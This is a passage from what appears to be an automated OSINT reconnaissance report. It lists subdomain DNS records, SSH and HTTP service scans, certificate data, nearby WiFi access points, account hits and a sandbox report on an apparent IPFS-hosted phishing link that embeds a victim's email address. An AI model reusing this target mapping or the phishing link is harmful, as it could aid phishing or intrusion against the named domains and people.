{"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", 
"resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", 
"resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", 
"resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", 
"why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", 
"rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:59:51 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | robert@broofa.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeia3mp&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#kantonsen%40encoded.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ad0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ad0_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ad0_IE_EarlyTabStart_0x588_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ad0_IESQMMUTEX_0_303"\n "IsoScope_ad0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ad0_ConnHashTable<2768>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2768"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.214.129:443"\n "142.251.214.131:443"\n "142.250.189.238:443"\n "185.199.111.153:443"\n "69.16.175.10:443"\n "142.250.189.234:443"\n "184.27.80.18:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': 
None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "m_el_main_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_D809339D-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._D809339B-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "X2WYMCV5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\X2WYMCV5.txt]- [targetUID: 00000000-00002768]\n "DEW9N13E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DEW9N13E.txt]- [targetUID: 00000000-00003116]\n "_E2C1FED7-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "1NX8I2I6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1NX8I2I6.txt]- [targetUID: 00000000-00002768]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "UX69Y2OK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UX69Y2OK.txt]- [targetUID: 00000000-00003116]\n "BQ7YREAH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BQ7YREAH.txt]- [targetUID: 00000000-00003116]\n "~DF7ADEEE89A7F7CB7A.TMP" has type "data"- Location: [%TEMP%\\~DF7ADEEE89A7F7CB7A.TMP]- [targetUID: 00000000-00002768]\n "C1BNT20A.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1BNT20A.txt]- [targetUID: 00000000-00002768]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document 
File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "m_navigationui_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002768]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.google.com/support/translate+(en==Hn?:#googtrans/en/+Hn);var"\n Pattern match: "https://www.google.com/tools/feedback},Tw=function(a){return"\n Pattern match: "https://github.com/madler/zlib/blob/master/zlib.h"\n Pattern match: "https://www.google.com/images/cleardot.gif"\n Pattern match: "https://==Pn?V.Gh:null};this.Z={qb:Un,xd:null};a&&"\n Pattern match: "V.Pb/\ufffd\u0331"\n Pattern match: "http://fontawesome.io"\n Pattern match: "http://fontawesome.io/license"\n Pattern match: "http://jquery.com/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://sizzlejs.com/"\n Pattern match: "https://www&google.com/images/zippy_minus_sm.gif"\n Pattern match: "http://www.w3.org/TR/selectors/#attribute-selectors"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#attribute-selectors"\n Pattern match: "https://developer.mozilla.org/en/Security/CSP"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#escaped-characters"\n Pattern match: "http://bugs.jquery.com/ticket/12282#comment:15"\n Pattern match: "http://blindsignals.com/index.php/2009/07/jquery-delay/"\n Pattern match: "http://bugs.jquery.com/ticket/12359"\n Pattern match: 
"http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291"\n Pattern match: "http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/"\n Pattern match: "http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_AVAILABLE)"\n Pattern match: "http://javascript.nwbox.com/IEContentLoaded/"\n Pattern match: "http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx"\n Pattern match: "http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context"\n Pattern match: "http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html"\n Pattern match: "http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked"\n Pattern match: "http://www.w3.org/TR/css3-syntax/#characters"\n Pattern match: "http://www.w3.org/TR/selectors/#empty-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#lang-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#pseudo-classes"\n Pattern match: "https://github.com/jquery/jquery/pull/764"\n Pattern match: "http://json.org/json2.js"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=491668"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier"\n Pattern match: "https://developer.mozilla.org/en-US/docs/CSS/display"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=649285"\n Pattern match: "http://dev.w3.org/csswg/cssom/#resolved-values"\n Pattern match: "http://jsperf.com/getall-vs-sizzle/2"\n Pattern match: "https://bugs.webkit.org/show_bug.cgi?id=29084"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#whitespace"\n Pattern match: "https://bafybeia3mpocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a.ipfs.dweb.link/"\n Pattern match: "https://translate.google.com/translate_a/element.js?cb=gtElInit&hl=en-US&client=wt"\n Pattern match: 
"https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/exm=corsproxy/ed=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=navigationui"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=corsproxy"\n Pattern match: "https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog\\]]],null,null,null,null,null,null,-3600,null,null,null,null,[],1,nu |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Open-source software hosting facilities | cdn-185-199-111-153.github.com |
| 2023-05-12 02:48:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:a2:98:ee:7c:0f:82:53:85:c9:ed:86:47:94:a7:aa:74:64
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:54:05 2023 GMT
Not After : Apr 27 17:54:04 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d2:cd:d6:7e:84:63:03:a9:a4:54:af:d4:a6:67:
cf:f7:3e:0c:ab:80:9d:a8:22:bf:ee:64:c0:1e:dd:
e1:9d:29:3b:aa:bb:b6:1a:dd:d0:c3:5d:15:61:c8:
eb:00:a8:62:02:a5:c4:0c:4d:3a:56:20:d3:19:1c:
24:d9:21:05:da:7b:34:cd:5b:3f:9f:3f:ff:56:cb:
60:a2:2a:6a:1f:63:a5:f7:6c:bc:e6:cd:4b:7c:cb:
c6:0b:ba:27:31:61:c2:7b:47:19:7b:f1:52:41:68:
44:d8:1a:a5:11:c2:d5:cd:2d:49:92:07:b0:5c:c3:
2d:0c:54:f4:e5:8e:0a:3e:0a:05:99:5f:e9:65:18:
80:c0:5e:b2:87:08:2d:60:b2:01:35:c9:41:a1:4e:
56:80:bc:0b:2d:89:62:c9:e1:19:f4:a9:de:a5:de:
27:dd:96:99:29:26:9e:36:03:45:4b:bf:4a:de:ef:
5f:47:82:05:6f:ed:a1:4f:34:05:75:05:59:d0:32:
a2:22:c4:9d:5a:65:cd:6b:45:d7:7f:45:90:2e:36:
4c:3d:0a:62:83:36:a6:3c:d9:df:00:c7:cb:10:68:
6e:0c:d8:9c:a6:a5:e6:32:7b:12:0d:1c:1f:90:20:
a5:a7:c9:da:be:0f:96:fe:30:6b:29:55:ac:4a:68:
7b:12:dd:43:df:cf:f5:49:87:8c:9b:38:92:62:52:
c6:f8:97:d4:43:d6:ed:cb:66:79:5b:c9:60:9e:db:
33:f0:59:fb:fd:35:62:83:55:b5:65:04:20:55:ee:
82:6d:de:85:c1:18:ed:8c:10:29:47:46:ee:2a:eb:
57:cd:b1:5e:14:a7:37:00:58:3a:35:9d:fe:99:73:
d6:cd:b6:67:17:f6:27:29:ea:32:96:67:c8:fa:43:
a3:c2:cc:ca:bb:cb:87:e5:76:db:8a:de:bc:58:c7:
6c:12:6a:a6:93:1b:0a:ce:07:98:f7:7c:0d:1d:5e:
2a:ac:2b:fb:17:f1:cb:e0:a5:02:67:2b:3d:67:81:
d8:de:3e:15:6a:f0:a0:0d:64:2d:0e:9b:55:1e:1b:
69:69:5a:ae:14:c6:1c:ce:8e:c5:fd:2c:25:74:92:
c1:35:de:00:ee:bc:fa:5d:88:f2:17:fe:70:37:3b:
3b:f5:14:3a:4b:f4:50:a9:91:31:99:48:3f:9e:c6:
ad:0b:a6:89:2d:77:db:fb:64:f8:31:9a:82:d1:cd:
f7:6a:51:a4:b7:d3:da:23:3d:ff:2a:45:de:3b:b5:
32:78:69:cd:54:60:d3:2a:39:e1:61:db:5a:d2:78:
94:77:f6:b5:99:c5:b9:3c:95:4b:75:db:f8:2b:d4:
ad:de:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:62:E5:21:FA:E8:50:FB:CE:5D:D2:7E:68:EA:9B:E0:B1:2E:4D:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
15:ef:a6:fd:ef:21:53:78:53:f6:e6:7d:e0:a9:be:9a:f4:2a:
f3:6b:f8:45:b0:1e:92:39:ea:7f:20:4e:9d:7e:15:34:36:61:
5c:46:2f:03:80:59:84:da:ef:66:78:da:e7:b0:f0:dc:e6:6a:
c6:b2:06:d7:47:db:11:48:d1:1f:c9:fd:2b:78:20:9d:86:11:
3b:e4:51:10:b8:54:d7:6e:6f:db:ce:56:14:fa:f5:79:05:a8:
02:0b:cb:0a:18:31:3a:e9:dd:4b:c7:d7:53:e4:2f:bc:37:98:
11:c7:a5:55:7f:64:7e:ee:5a:1d:86:0e:38:0c:bd:8e:2a:bd:
3e:16:9b:63:5f:9f:06:9d:58:f3:3d:71:94:e6:c1:49:68:5e:
41:22:f6:d4:2e:f7:b9:62:b8:3b:2f:c1:c6:66:8c:a7:82:e0:
40:ef:66:13:cd:53:80:bc:ca:bc:49:c0:67:81:c8:1d:d8:f5:
37:5a:da:e3:56:36:cd:fd:cb:00:ce:97:33:4d:b7:29:cd:90:
4e:43:37:62:d7:92:39:fa:36:a2:59:0a:4f:35:fa:8e:5a:01:
29:c9:4e:6f:ae:1d:31:a2:f5:71:7f:a1:e1:58:17:ea:74:b0:
26:53:2b:a4:97:e8:9a:a1:10:a9:a5:e1:7b:21:18:15:30:ae:
dd:15:ba:8d
| battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-25 03:05:10 | battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | UTAAPC (Net ID: 00:02:6F:35:38:63) | 37.7642, -122.3993 |
| 2023-05-12 02:44:27 | Web Technology | No | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Express | nwapi.battleb0t.xyz |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Bookcrossing (Category: hobby)
https://www.bookcrossing.com/mybookshelf/Altpapier | Altpapier |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | omniblock (Net ID: 00:09:5B:E9:6B:D6) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.254): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c55c7e88fa82340-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WLAN_HS (Net ID: 00:01:E3:41:FA:3E) | 50.1188, 8.6843 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | clownleo (Net ID: 00:02:CF:AF:25:7D) | 40.2024, 29.0398 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551552560 (Net ID: 00:01:E3:55:25:60) | 52.3759, 4.8975 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | KEIL (Net ID: 00:01:38:A5:B3:D3) | 37.7642, -122.3993 |
